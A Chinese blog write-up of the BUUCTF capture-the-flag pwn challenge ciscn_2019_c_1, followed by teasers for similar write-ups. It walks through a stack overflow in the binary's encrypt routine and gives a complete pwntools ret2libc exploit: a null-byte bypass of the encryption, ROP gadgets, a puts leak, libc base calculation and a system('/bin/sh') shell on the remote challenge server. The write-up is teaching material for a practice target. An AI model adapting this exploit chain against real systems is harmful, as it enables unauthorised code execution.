[BUUCTF-pwn]——ciscn_2019_c_1

原创 已于 2023-10-24 21:29:41 修改 · 1.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节

于 2021-02-07 13:43:50 首次发布
本文详细介绍了如何通过RET2LIBC技术解决一个CTF比赛中的pwn类型题目。作者首先分析了二进制文件的安全特性,发现没有system函数,并确定了ret2libc的攻击策略。接着,利用ROPgadget找到所需汇编指令的地址,考虑到栈平衡,构造了exploit。在交互过程中,获取puts函数地址并计算libc基址,最终实现system调用执行/bin/sh。文章强调了在不同libc版本中可能需要尝试不同的方法。

[BUUCTF-pwn]——ciscn_2019_c_1

  • 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1
  • 题目:
    在这里插入图片描述
    下载下来checksec一下
    在这里插入图片描述
    再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串,也没有system函数。
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述
应该是ret2libc的题型。仔细观察函数,发现 '\0’开头的字符串可以完美的绕过加密,不改变我们输入的payload。或者也可以自己写一下解密函数。

先用ROPgadget 找一下需要用到的汇编指令的地址。ret ubuntu18上有栈平衡,用来进行栈对齐。
在这里插入图片描述

所以exploit如下

from pwn import*
p=remote('node4.buuoj.cn',27205)
elf=ELF('./ciscn_2019_c_1')
libc = ELF('libc-2.27.so')
context.log_level = 'debug'
main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

p.sendlineafter('Input your choice!\n','1')
payload=b'\x00'+b'a'*(0x50-1+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)

p.sendlineafter('Input your Plaintext to be encrypted\n',payload)
p.recvline() #将下面两个puts跳过
p.recvline()
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))
log.info("puts_addr:" + hex(puts_addr))

libc_base = puts_addr - libc.sym['puts'] #计算偏移
sys_addr = libc_base + libc.sym["system"]
binsh = libc_base + 0x00000000001b3e9a
p.sendlineafter('choice!\n','1')
payload=b'\x00'+b'a'*(0x50-1+8) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(sys_addr) # p64(ret)的数量不固定,可以自己尝试。
p.sendlineafter('encrypted\n',payload)
p.interactive()

会出现两个libc的版本,两个都试试就可以了。
在这里插入图片描述

Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1505
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 721
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
BUUCTF ciscn_2019_c_1
N1rvana的博客
11-14 5532
一道积攒了很久才解出来的题,这道题大体不难,但是好多小细节呜呜呜。而且Libcsearcher里的libc库没更新(上篇博客讲了)。 这道题是BUUCTF上的ciscn_2019_c_1。标准的64位ROP流程,我也就分享一下自己的坎坷心路历程。 代码审计 老规矩checksec一下,只开了nx保护。 观察main函数 显然哦,只有输入1才有点用。 关键函数:encrypt() 发现一个栈溢出漏洞。ROP链的入口。 然后就是读取s的长度,在长度范围内对内容进行加密:也就是根据ascii码范围不同来进行
BUUCTF-Pwn-ciscn_2019_c_1
餐桌上的猫
02-14 3747
题目截图 检查一下文件信息 开启了NX,64位的文件 使用IDA打开 按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串 一番寻找也没有找到system函数 查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手 找到gets函数所在位置查看 在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用 双击进入查看调用函数 运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4261
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 707
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 421
BUUCTF 做题练习
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 8756
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 1036
通俗易懂
BUUCTF-PWN】9-ciscn_2019_n_8
燕麦葡萄干的博客
07-05 462
4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节。不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools。32位,开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。
BUUCTF-PWNciscn_2019_c_1
qcwwww的博客
05-07 555
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 748
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
buuctf PWN ciscn_2019_c_1
wp568的博客
10-08 360
amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)->本函数地址 -> 返回地址。encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。
BUUCTF-PWN11-ciscn_2019_c_1
燕麦葡萄干的博客
07-05 1317
再利用pop_rdi;ret语句进行将下一层值推入寄存器rdi中作为参数,本次payload构建目的在于利用puts函数泄露本身的真实地址,从而获取Libc基址,所以将puts_got作为参数,运行函数地址为puts_plt,即用puts来打印出Puts_got的地址,最后再返回start函数重新运行,在后续中再次利用libc的基址找出system以及“bin/sh”的地址,从而构建第二次payload,要注意的是由于靶机是Ubuntu,所以要构建栈平衡,第二次payload需要加入ret。
Pwn_buuctf_ciscn_2019_c_1
Trick的博客
11-20 514
libc64 ida查看 在main函数没有发现明显漏洞 跟进encrypt()函数 发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell exp: from pwn import * from LibcSearcher import * p= remote('node3.buuoj.cn',25412) #p= remote('127.0.0.1',12345) #p = process('./ciscn_2019_c_1') #
BUUCTF Pwn ciscn_2019_c_1 题解
qq_33348179的博客
12-01 494
2.接下来找libc的版本 利用 libc地址 = 真实地址 - 偏移地址 得到system和binsh的地址。其中,用两次recvline()的原因是隔离掉 \n 和 ciphertext。puts_address的那一大串是用于接收地址 去掉结尾的\0 并且将长度补到。SHIFT+F12查看字符串 可以看到没有后门函数 这是一道ret2libc题。同时因为这是64位程序,函数参数用寄存器存储且第一个是 RDI寄存器。1.首先,构造payload1,得到puts的真实地址。ret用于64位栈平衡。
日行一PWNciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 944
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
buuctf--ciscn_2019_c_1
最新发布
2301_81060697的博客
02-20 870
获取libc库构造rop链
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值